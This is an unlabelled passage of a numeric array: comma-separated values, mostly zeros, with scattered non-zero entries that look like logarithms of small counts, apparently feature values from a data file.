0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 9.899745575730817, 0.0, 0.0, 0.0, 0, 0.0, 0, 0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 10.781540614970998, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 4.969640753475787,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 3.1354942159291497, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.6931471805599453, 0.0, 1.6094379124341003, \n 1.791759469228055, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 3.295836866004329,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 3.58351893845611, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.4849066497880004, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 3.6635616461296467, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0,\n 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.8903717578961645, 0.0,\n 0, 1.3862943611198906, 2.833213344056216, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 3.4339872044851467, 0.0, 0.0, 0, \n 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.6390573296152584, 0, 0.0, 9.406482647787449, 0.0, 0.0, \n 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 1.9459101490553132, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 3.295836866004329, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0, 0.0, \n 2.995732273553991, 6.127701357652087, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 2.9444389791664403, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 1.0986122886681098, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 2.302585092994046, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 4.110873864173311, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 2.5649493574615367, 3.4965075614664802, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 3.4339872044851467, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.58351893845611, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.302585092994046, 0, 0.0, 1.3862943611198906, 5.442417710521793, 0.0, \n 0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0, 5.723585101952381, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 1.0986122886681098, 1.6094379124341003, 0, 0.0, 0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 2.1972245773362196, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 